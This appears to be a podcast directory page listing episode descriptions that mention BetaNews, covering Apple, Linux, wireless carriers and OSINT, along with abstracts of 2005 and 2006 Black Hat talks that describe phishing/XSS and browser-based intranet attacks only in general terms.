POPULARITY
Cast: Ahmani and AaronSpoiler Cast: Ahmani and PeleSanctum 2Son of the forestPokemon DnDJohn Wick chapter 4Diablo 4 betaNEWS
Oh, great! Zoom has announced a 40-minute call limit for one-on-one meetings starting this month. In this episode, Amit and Chris discuss this news and several affordable alternatives available to you when you're meeting with students. Links: * [Original Story on BetaNews](https://betanews.com/2022/04/26/zoom-is-slashing-the-length-of-free-1-on-1-meetings-from-may/) * [Apps for Authors](https://writing.fyi/apps) * [New Zenler](https://www.newzenler.com/invite/zmnfZZ) * [5K Course Launch Blueprint](https://getnzlr.com/5k-launch-blueprint/)
Patrick Emerson, director of IT from New Springs Church joins us to talk about their migration from their proprietary walled garden network and storage, to free and open source options. -- During The Show -- 00:55 VPS that accepts physical cash? - Charlie Brown Host that accepts cypto currency Pre-paid credit card 05:30 User Responds to Ventoy - Chris Ineo M.2 NVMe Enclosure Affiliate Link (http://www.amazon.com/dp/B0827PB71G/?tag=minddripmedia-20) IODD 2531 Affiliate Link (http://www.amazon.com/dp/B00TDJ4BJU/?tag=minddripmedia-20) IODD 2541 Affiliate Link (http://www.amazon.com/dp/B00S3G12E6/?tag=minddripmedia-20) Japanese chat Giveaway - write in your war story where one of these would have saved you 09:50 Firefox Audio Response - Cory restart in safe mode (no need to disable add-ons) 11:30 Firefox Audio Feedback - Matthew CLI Command: flatpak install org.freedesktop.Platform.ffmpeg-full/x86_64/20.08 12:20 Managing Documents Response - Jordan Open Paper (https://openpaper.work/en/) 14:40 Pick of the Week Easy WSL Turns Docker Containers into WSL distros EasyWSL GitHub (https://github.com/redcode-labs/easyWSL) TechRadar (https://www.techradar.com/sg/news/this-new-tool-converts-pretty-much-any-linux-docker-image-into-a-wsl-distro) 15:50 Kodi / LibreElec Available Kodi - Media Player App LibreElEC 10 - Distribution IR Remote Affiliate Link (http://www.amazon.com/dp/B00M4I1BAY/?tag=minddripmedia-20) Nvidea Shield spams ads LibreELEC 10 has a few bugs Kodi.tv (https://kodi.tv/) BetaNews (https://betanews.com/2021/08/27/kodi-19-matrix-libreelec-10-linux/) 24:25 Kernel 5.14 Released Secret Memory Areas Hot-Unplug AMD Radeon Cards New/Improved Hardware Support Xbox One Controller RaspberryPi 400 Dell Hardware Kill-Switches Low Latency USB driver OMG Ubuntu (https://www.omgubuntu.co.uk/2021/08/linux-kernel-5-14-new-features) 26:10 Patrick Emerson Interview Director of IT 5,000-7,000 Attendees New Spring (https://www.newspring.org) Came into everything falling apart Sophos router was undocumented and out of date Sophos wanted $300/hr to help 1.4 TB of video created per week Typical weeks work Screenly (https://www.screenly.io/) Bought 2 PFSense routers D-Day (things fell apart) Sophos freaked out and died Have someone looking over your shoulder to double check things Windows requires DHCP relay to be turned on when being used as a DHCP server Add a "uknown to internet allow" rule PFSense and OPNSense UI make networking clear Future network planning Dell Servers with direct access to the drives IX Systems (https://www.ixsystems.com/) 45 Drives (https://www.45drives.com/) -- The Extra Credit Section -- For links to the articles and material referenced in this week's episode check out this week's page from our podcast dashboard! This Episode's Podcast Dashboard (http://podcast.asknoahshow.com/248) Phone Systems for Ask Noah provided by Voxtelesys (http://www.voxtelesys.com/asknoah) Join us in our dedicated chatroom #GeekLab:linuxdelta.com on Matrix (https://element.linuxdelta.com/#/room/#geeklab:linuxdelta.com) -- Stay In Touch -- Find all the resources for this show on the Ask Noah Dashboard Ask Noah Dashboard (http://www.asknoahshow.com) Need more help than a radio show can offer? Altispeed provides commercial IT services and they're excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show! Altispeed Technologies (http://www.altispeed.com/) Contact Noah live [at] asknoahshow.com -- Twitter -- Noah - Kernellinux (https://twitter.com/kernellinux) Ask Noah Show (https://twitter.com/asknoahshow) Altispeed Technologies (https://twitter.com/altispeed) Special Guest: Steve Ovens.
Joe Gray @C_3PJoe OSINTION https://theosintion.com New book… ship date? How to get it? https://www.amazon.com/Practical-Social-Engineering-Joe-Gray/dp/171850098X/ https://nostarch.com/practical-social-engineering "Gray provides a very accessible look at social engineering that should be essential reading for pentesters and ethical hackers." — Ian Barker, BetaNews Story (Bryan: found my shipmate from the Navy) Gathering OSINT (what is ethically too far?) OSINT heartbeat https://matrix.berkeley.edu/research-article/berkeley-protocol-open-source-investigations/ https://hunter.io/ https://halalgoogling.com/ The OSINTion Discord: https://discord.gg/p78TTGa Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
This week we feature commentator Josh Centers, Managing Editor for TidBITS, and author of "Take Control of Apple TV" and other titles, who covers Apple's surprising release of a major update for the MacBook Pro. The refresh features 6-core processors, solid state drives as large as 4TB and up to 32GB RAM, twice as much as Apple has previously offered. Is this the professional notebook that many users have craved after expressing disappointment with the models offered over the past two years? Josh will also provide speculation about a possible future successor to the Mac, using an ARM-based CPU instead of Intel. Will this be a sort of convergence machine offering features derived from the iPad and Mac, or something altogether new? There will also be a discussion about health and fitness privacy, where Gene wonders if anyone would care if it got out that he's just shy of six feet one inch tall and weighs 178.5 pounds? In a special encore presentation, you’ll also hear from tech columnist and former industry analyst Joe Wilcox, who writes for BetaNews. During this episode, Joe will explain why he regards Apple’s Siri voice assistant as worse than Microsoft’s Skype, despite all the connection glitches with the latter. Will hiring former Google executives help Apple make Siri more responsive and accurate, without sacrificing your security? You’ll also hear about Google I/O and Android P, and about all those fake news reports that the iPhone X was unsuccessful. For two quarters straight, however, Apple reported that the iPhone X was not only its best selling smartphone for each week it was on sale, but the hottest selling smartphone on the planet. Gene shares his 20 years experience with the iMac, which began with the original Bondi Blue model that he beta tested for Apple as part of the former Customer Quality Feedback (CQF) program. You’ll also hear about the Apple Watch and whether it makes sense for Apple to switch Macs from Intel to ARM CPUs.continued to spread false rumors about iPhone sales over the years.
This week, we invite you to meet Major General (Ret) Earl D. Matthews: He spent three decades at the nexus of big budgets and cybersecurity, including stints as Director, Cyberspace Operations and Chief Information Security Officer at HQ, U.S. Air Force, and VP for Enterprise Security Solutions at Hewlett-Packard. In his current role as Senior VP and Chief Strategy Officer at Verodin, Inc., he champions the concept of security instrumentation, a process that continuously validates the effectiveness of each security element in place. During this episode, he'll cover a gamut of cybersecurity issues that include the privacy issues at Facebook, the DNC hack, along with managing your personal privacy at a time when tens of millions of Americans have had their credit reports hacked. Major General Matthews will also reveal two episodes of ID theft that impacted his own family. You'll also hear from tech columnist and former industry analyst Joe Wilcox, who writes for BetaNews. During this episode, Joe will explain why he regards Apple's Siri voice assistant as worse than Microsoft's Skype, despite all the connection glitches with the latter. Will hiring former Google executives help Apple make Siri more responsive and accurate, without sacrificing your security? You'll also hear about Google I/O and Android P, and about all those fake news reports that the iPhone X was unsuccessful. For two quarters straight, however, Apple reported that the iPhone X was not only its best selling smartphone for each week it was on sale, but the hottest selling smartphone on the planet. Gene shares his 20 years experience with the iMac, which began with the original Bondi Blue model that he beta tested for Apple as part of the former Customer Quality Feedback (CQF) program. You'll also hear about the Apple Watch and whether it makes sense for Apple to switch Macs from Intel to ARM CPUs.
This week, we invite you to meet Major General (Ret) Earl D. Matthews: He spent three decades at the nexus of big budgets and cybersecurity, including stints as Director, Cyberspace Operations and Chief Information Security Officer at HQ, U.S. Air Force, and VP for Enterprise Security Solutions at Hewlett-Packard. In his current role as Senior VP and Chief Strategy Officer at Verodin, Inc., he champions the concept of security instrumentation, a process that continuously validates the effectiveness of each security element in place. During this episode, he'll cover a gamut of cybersecurity issues that include the privacy issues at Facebook, the DNC hack, along with managing your personal privacy at a time when tens of millions of Americans have had their credit reports hacked. Major General Matthews will also reveal two episodes of ID theft that impacted his own family. You'll also hear from tech columnist and former industry analyst Joe Wilcox, who writes for BetaNews. During this episode, Joe will explain why he regards Apple's Siri voice assistant as worse than Microsoft's Skype, despite all the connection glitches with the latter. Will hiring former Google executives help Apple make Siri more responsive and accurate, without sacrificing your security? You'll also hear about Google I/O and Android P, and about all those fake news reports that the iPhone X was unsuccessful. For two quarters straight, however, Apple reported that the iPhone X was not only its best selling smartphone for each week it was on sale, but the hottest selling smartphone on the planet. Gene shares his 20 years experience with the iMac, which began with the original Bondi Blue model that he beta tested for Apple as part of the former Customer Quality Feedback (CQF) program. You'll also hear about the Apple Watch and whether it makes sense for Apple to switch Macs from Intel to ARM CPUs.
Den dynamiska duon Jonasson/Larsson ges den här veckan fria tyglar när herr Söderlund, som vanligen är mannen bakom spakarna, har åkt på tjänsteresa till andra sidan jorden. Detta till trots blir det ändå skapligt städat och ännu en vecka full av åsikter. Det diskuteras friskt kring hur vi ställer oss till betaversioner av appar och operativsystem när vi redovisar pollen från förra veckan. Vi tittar också närmare på den bevakning som Facebook utsätter dig som användare för på andra hemsidor, oavsett om du är inloggad eller inte. Detta och mer trängs i veckans avsnitt. Väl mött! Ur veckans innehåll Feedback Varför Vim använder H, J, K och L-tangenterna för att navigera Hur gör du (och varför gör du fel)? Betanews Ämnen Facebook bevakning av icke-användare är olaglig (igen) Chromes inbyggda annonsblockerare Eftersnack Vi deltar på årets upplaga av Vetenskapsfestivalen Liveinspelning samt efterföljande meetup! Förra årets inspelning från Vetenskapsfestivalen Lyssna på roddar via Sonos Pocket Casts Castro TuneIn En podd om teknik Hemsida Skicka feedback Livechatten Köp vår snygga t-shirt med EPOT-tryck Annonsera hos oss Om oss Social media En podd om teknik på Twitter En podd om teknik på Facebook En podd om teknik på Instagram Jezper på Twitter Johan på Twitter Magnus på Twitter
We feature outspoken commentator/podcaster Peter Cohen. During this segment, Gene will discuss his efforts to get decent support from AT&T wireless, which involved multiple phone calls, and frustrating encounters with more than 20 different reps. Did he finally succeed? Gene and Peter will also discuss the prospects for new Mac notebooks at Apple's 2017 WWDC developer event in June. And what about Apple's decision to deliver subpar gaming performance on the Mac? As a former Macworld gaming columnist, Peter explains what is going on, and what he believes to be Apple's reasons for not paying attention to the needs of avid gamers. You'll also hear from independent tech journalist Joe Wilcox, who writes for BetaNews. This wide-ranging discussion will include Joe's observations about the quality of the four major wireless carriers in the U.S., as he explains the surprising result of his efforts to switch from one company to another to get better download speeds. Were there any notable announcements at the 2017 Google I/O conference in Mountain View, CA? Was it all about photos? What about the voice assistant platforms from Amazon, Apple and Google? Should Apple respond to the Amazon Echo with its own version? Gene and Joe will also talk about the prospects for new Mac notebooks at the WWDC, and is there a possibility that Apple will pull the plug on one of its three notebook models?
We feature tech journalist Josh Centers, Managing Editor for TidBITS, and author of "Take Control of Apple TV" and other titles. The discussion begins with Gene's strange story of the problems he encountered installing macOS Sierra on a 2010 17-inch MacBook Pro. The segment moves on to reports that Apple is giving the Mac short shrift, and whether such stories have any credibility. Josh brings up the question of whether innovation in the tech industry began to slow down after the death of Steve Jobs in 2011. Or is that just the way the industry was destined to evolve? You'll also hear from independent tech journalist Joe Wilcox, who writes for BetaNews. He'll tell the curious tale of the two Late 2016 MacBook Pros that he owns, and the battery life issues he has confronted on both. Yet when he gave one of those notebooks, the 13-inch model, to his wife and reconfigured it with her apps and settings, battery life was normal. What about the erratic battery life tests reported by Consumer Reports magazine, which decided not to recommend the new MacBook Pros? The discussion moves to the pressing topic of whether Apple's quality control has nosedived in recent years, as Gene cites the long-term problems with the macOS' "forgetful" Finder.
We feature outspoken blogger and podcaster Peter Cohen, who focuses on the questions raised about Apple's ongoing commitment to professional users. And what about published reports, since denied, that chief designer Sir Jonathan Ive may no longer be fully involved in developing new Apple gear? The discussion also includes ousting the manager of the automation division, home of AppleScript, Apple's decision to give up building its own displays, and the ever-controversial Late 2016 MacBook Pro, which features the contextual Touch Bar and a much higher price. You'll also hear from columnist Joe Wilcox, of BetaNews, who will explain why he prefers his new iPhone 7 Plus despite the fact that he finds some of Google's services, such as its voice assistant, to be superior. What should Apple be thankful for during the holiday season? Joe offers his opinions about his 13-inch MacBook Pro with Touch Bear, and also the impact of Google's Chromebook in American school systems, and whether its cheap price and focus on cloud-based apps makes it a better educational alternative. And what about Microsoft's controversial decision to force Windows 10 upgrades on users, and what about sharing telemetry data culled from users with third parties?
On this week's all-star episode, John Martellaro, Senior Editor, Analysis & Reviews for The Mac Observer, will discuss the recent appearance of Apple CEO Tim Cook at an AllThingsD event, and what he calls "Cook Code." He'll also talk about the tragic state of iPad magazines, operations research and tech warfare, and deliver an iPhone veteran's review of the Samsung Galaxy Note II "phablet." If you're in the market for a car, you'll want to hear from Dennis Miller, Founder and CEO of SNAFU Scan, an iOS and Android app that helps you check whether your car has been recalled by the manufacturer, and the ability to examine used car auction prices to see if your dealer is ripping you off on a trade. In our third segment, Joe Wilcox, Managing Editor of BetaNews, talks about his recent decision to move his wireless service from AT&T to T-Mobile, and proceeds to discuss what we might expect to see in Microsoft's Windows 8.1 update, and whether it can address some of the concerns about the original Windows 8 release.
On this week's all-star episode, we present Bryan Chaffin, co-founder and co-publisher of The Mac Observer, who will talk about Apple's large stash of cash and the taxman, plus other subjects, including T-Mobile's new marketing scheme that is intended to eliminate subsidized handsets. You'll also hear from Joe Wilcox, Managing Editor of BetaNews, who will talk about the increase in cyber attacks on major Web sites, including banks and other financial institutions, why he's switching his cellular service to T-Mobile, and other topics that include Samsung's impact on the Android platform.
On this week's all-star episode, commentator Joe Wilcox, Managing Editor of BetaNews, discusses the outcome of the Federal Trade Commission's probe into Google's search policies, and the verdict that addresses the patent licensing policies of Google's Motorola Mobility division. Joe will also discuss his article suggesting that Apple may have lost its stomach for industry-shaking revolutions of their product lines. You'll also hear from Avram Piltch, Online Editor Director of Laptop magazine, who will talk about the sort of product intros expected at the Consumer Electronics Show in Las Vegas, held the second week of January and express his ongoing concerns about the prospects for Windows 8.
On this week's all-star episode, tech journalist Rob Pegoraro, who writes for USA Today and other publications, covers such subjects as satellite Internet, broadband Internet performance, the possibilities for the iPad mini, the impending arrival of Windows 8 and the Microsoft Surface tablet. Joe Wilcox, Managing Editor of BetaNews, covers the Windows 8 issues, the introduction of the Surface tablet, and Apple's possible plans for the iPad mini and other expected new products.
We focus on some key announcements from Microsoft that have dominated tech news, such as the demonstration of a 10.6-inch tablet in two versions known as Surface, and the first announcement about the new features in Windows Phone 8. We'll also cover the potential and some of the key problems that have appeared in the forthcoming Windows 8 upgrade. Our guests include outspoken columnist and former industry analyst Joe Wilcox, from BetaNews, commentator Jim Dalrymple, Editor in Chief of The Loop, and Mike Prospero, Reviews Editor of Laptop magazine. We'll also cover Apple's amazing new MacBook Pro with Retina display, and its impact to the notebook market.
T-Mobile is hurting financially. Consumers increasingly face wireless carrier domination. Is there enough wireless competition in the U.S.? Would having greater competition reduce mobile charges and increase services? Some thoughts… Betanews has an interesting article about T-Mobile USA, its wireless competitors and Deutsche Telekom, TM’s parent corporation in Germany. Did you know that T-Mobile has […]
Black Hat Briefings, Japan 2005 [Audio] Presentations from the security conference
"The use of phishing/cross-site scripting (XSS) hybrid attacks for financial gain is spreading. It?s imperative that security professionals familiarize themselves with these new threats to protect their websites and confidential corporate information. This isn't just another presentation about phishing scams or cross-site scripting. We?re all very familiar with each of those issues. Instead, we?ll discuss the potential impact when the two are combined to form new attack techniques. Phishers are beginning to exploit these techniques, creating new phishing attacks that are virtually impervious to conventional security measures. Secure sockets layer (SSL), blacklists, token-based authentication, browser same-origin policy, and monitoring / take-down services offer little protection. Even eyeballing the authenticity of a URL is unlikely to help. By leveraging cross-site scripting, the next level of phishing scams will be launched not from look-alike web pages, but instead from legitimate websites! This presentation will demonstrate how these types of attacks are being achieved. We'll also demonstrate the cutting edge exploits that can effectively turn your browser into spyware with several lines of JavaScript. And, we'll give you the steps you need to take to protect your websites from these attacks. Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security (http://www.whitehatsec.com), where he is responsible for web application security R&D and industry evangelism. As a seven-year industry veteran and well-known security expert, Mr. Grossman is a frequent international conference speaker at the Blackhat Briefings, ISSA, ISACA, NASA, and many other industry events. Mr. Grossman's research, writings, and discoveries have been featured in USA Today, VAR Business, NBC, ABC News (AU), ZDNet, eWeek, BetaNews, etc. Mr. Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo!, responsible for performing security reviews on the company's hundreds of websites."
Black Hat Briefings, Las Vegas 2005 [Audio] Presentations from the security conference
The use of phishing/cross-site scripting hybrid attacks for financial gain is spreading. It's imperative that security professionals familiarize themselves with these new threats to protect their websites and confidential corporate information. This isn't just another presentation about phishing scams or cross-site scripting. We're all very familiar with each of those issues. Instead, we'll discuss the potential impact when the two are combined to form new attack techniques. Phishers are beginning to exploit these techniques, creating new phishing attacks that are virtually impervious to conventional security measures. Secure sockets layer (SSL), blacklists, token-based authentication, browser same-origin policy, and monitoring / take-down services offer little protection. Even eyeballing the authenticity of a URL is unlikely to help. By leveraging cross-site scripting, the next level of phishing scams will be launched not from look-alike web pages, but instead from legitimate websites! This presentation will demonstrate how these types of attacks are being achieved. We'll also demonstrate the cutting edge exploits that can effectively turn your browser into spyware with several lines of JavaScript. And, we'll give you the steps you need to take to protect your websites from these attacks. Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security (http://www.whitehatsec.com), where he is responsible for web application security Rresearch and developmentD and industry evangelism. As a seven-year industry veteran and well-known security expert, Mr. Grossman is a frequent conference speaker at the BlackHat Briefings, ISSA, ISACA, NASA, and many other industry events. Mr. Grossman's research, writings, and discoveries have been featured in USA Today, VAR Business, NBC, ZDNet, eWeek, BetaNews, etc. Mr. Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo!, responsible for performing security reviews on the company's hundreds of websites.
Black Hat Briefings, Las Vegas 2005 [Video] Presentations from the security conference
The use of phishing/cross-site scripting hybrid attacks for financial gain is spreading. It's imperative that security professionals familiarize themselves with these new threats to protect their websites and confidential corporate information. This isn't just another presentation about phishing scams or cross-site scripting. We're all very familiar with each of those issues. Instead, we'll discuss the potential impact when the two are combined to form new attack techniques. Phishers are beginning to exploit these techniques, creating new phishing attacks that are virtually impervious to conventional security measures. Secure sockets layer (SSL), blacklists, token-based authentication, browser same-origin policy, and monitoring / take-down services offer little protection. Even eyeballing the authenticity of a URL is unlikely to help. By leveraging cross-site scripting, the next level of phishing scams will be launched not from look-alike web pages, but instead from legitimate websites! This presentation will demonstrate how these types of attacks are being achieved. We'll also demonstrate the cutting edge exploits that can effectively turn your browser into spyware with several lines of JavaScript. And, we'll give you the steps you need to take to protect your websites from these attacks. Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security (http://www.whitehatsec.com), where he is responsible for web application security Rresearch and developmentD and industry evangelism. As a seven-year industry veteran and well-known security expert, Mr. Grossman is a frequent conference speaker at the BlackHat Briefings, ISSA, ISACA, NASA, and many other industry events. Mr. Grossman's research, writings, and discoveries have been featured in USA Today, VAR Business, NBC, ZDNet, eWeek, BetaNews, etc. Mr. Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo!, responsible for performing security reviews on the company's hundreds of websites.
Black Hat Briefings, Las Vegas 2006 [Audio] Presentations from the security conference
"Imagine you’re visiting a popular website and invisible JavaScript exploit code steals your cookies, captures your keystrokes, and monitors every web page that you visit. Then, without your knowledge or consent, your web browser is silently hijacked to transfer out bank funds, hack other websites, or post derogatory comments in a public forum. No traces, no tracks, no warning sirens. In 2005’s "Phishing with Superbait" presentation we demonstrated that all these things were in fact possible using nothing more than some clever JavaScript. And as bad as things are already, further web application security research is revealing that outsiders can also use these hijacked browsers to exploit intranet websites. Most of us assume while surfing the Web that we are protected by firewalls and isolated through private NAT'ed IP addresses. We assume the soft security of intranet websites and that the Web-based interfaces of routers, firewalls, printers, IP phones, payroll systems, etc. even if left unpatched, remain safe inside the protected zone. We believe nothing is capable of directly connecting in from the outside world. Right? Well, not quite. Web browsers can be completely controlled by any web page, enabling them to become launching points to attack internal network resources. The web browser of every user on an enterprise network becomes a stepping stone for intruders. Now, imagine visiting a web page that contains JavaScript malware that automatically reconfigures your company’s routers or firewalls, from the inside, opening the internal network up to the whole world. Even worse, common Cross-Site Scripting vulnerabilities make it possible for these attacks to be launched from just about any website we visit and especially those we trust. The age of web application security malware has begun and it’s critical that understand what it is and how to defend against it. During this presentation we'll demonstrate a wide variety of cutting-edge web application security attack techniques and describe bestpractices for securing websites and users against these threats. You’ll see: * Port scanning and attacking intranet devices using JavaScript * Blind web server fingerprinting using unique URLs * Discovery NAT'ed IP addresses with Java Applets * Stealing web browser history with Cascading Style Sheets * Best-practice defense measures for securing websites * Essential habits for safe web surfing Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security (http://www.whitehatsec.com), where he is responsible for web application security R&D and industry evangelism. As an well-known and internationally recognized security expert, Mr. Grossman is a frequent speaker at the Black Hat Briefings, ISSA, ISACA, NASA, and many other industry events. Mr. Grossman's research, writing, and interviews have been published in dozens of publications including USA Today, VAR Business, NBC, ABC News (AU), ZDNet, eWeek, Computerworld and BetaNews. Mr. Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo!, responsible for performing security reviews on the company's hundreds of websites. T.C. Niedzialkowski is a Senior Security Engineer at WhiteHat Security in Santa Clara, California. In this role, he oversees WhiteHat Sentinel, the company's continuous vulnerability assessment and management service for web applications. Mr. Niedzialkowski has extensive experience in web application assessment and is a key contributor to the design of WhiteHat's scanning technology."
Black Hat Briefings, Las Vegas 2006 [Video] Presentations from the security conference
Imagine you’re visiting a popular website and invisible JavaScript exploit code steals your cookies, captures your keystrokes, and monitors every web page that you visit. Then, without your knowledge or consent, your web browser is silently hijacked to transfer out bank funds, hack other websites, or post derogatory comments in a public forum. No traces, no tracks, no warning sirens. In 2005’s "Phishing with Superbait" presentation we demonstrated that all these things were in fact possible using nothing more than some clever JavaScript. And as bad as things are already, further web application security research is revealing that outsiders can also use these hijacked browsers to exploit intranet websites. Most of us assume while surfing the Web that we are protected by firewalls and isolated through private NAT'ed IP addresses. We assume the soft security of intranet websites and that the Web-based interfaces of routers, firewalls, printers, IP phones, payroll systems, etc. even if left unpatched, remain safe inside the protected zone. We believe nothing is capable of directly connecting in from the outside world. Right? Well, not quite. Web browsers can be completely controlled by any web page, enabling them to become launching points to attack internal network resources. The web browser of every user on an enterprise network becomes a stepping stone for intruders. Now, imagine visiting a web page that contains JavaScript malware that automatically reconfigures your company’s routers or firewalls, from the inside, opening the internal network up to the whole world. Even worse, common Cross-Site Scripting vulnerabilities make it possible for these attacks to be launched from just about any website we visit and especially those we trust. The age of web application security malware has begun and it’s critical that understand what it is and how to defend against it. During this presentation we'll demonstrate a wide variety of cutting-edge web application security attack techniques and describe bestpractices for securing websites and users against these threats. You’ll see: * Port scanning and attacking intranet devices using JavaScript * Blind web server fingerprinting using unique URLs * Discovery NAT'ed IP addresses with Java Applets * Stealing web browser history with Cascading Style Sheets * Best-practice defense measures for securing websites * Essential habits for safe web surfing Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security (http://www.whitehatsec.com), where he is responsible for web application security R&D and industry evangelism. As an well-known and internationally recognized security expert, Mr. Grossman is a frequent speaker at the Black Hat Briefings, ISSA, ISACA, NASA, and many other industry events. Mr. Grossman's research, writing, and interviews have been published in dozens of publications including USA Today, VAR Business, NBC, ABC News (AU), ZDNet, eWeek, Computerworld and BetaNews. Mr. Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo!, responsible for performing security reviews on the company's hundreds of websites. T.C. Niedzialkowski is a Senior Security Engineer at WhiteHat Security in Santa Clara, California. In this role, he oversees WhiteHat Sentinel, the company's continuous vulnerability assessment and management service for web applications. Mr. Niedzialkowski has extensive experience in web application assessment and is a key contributor to the design of WhiteHat's scanning technology."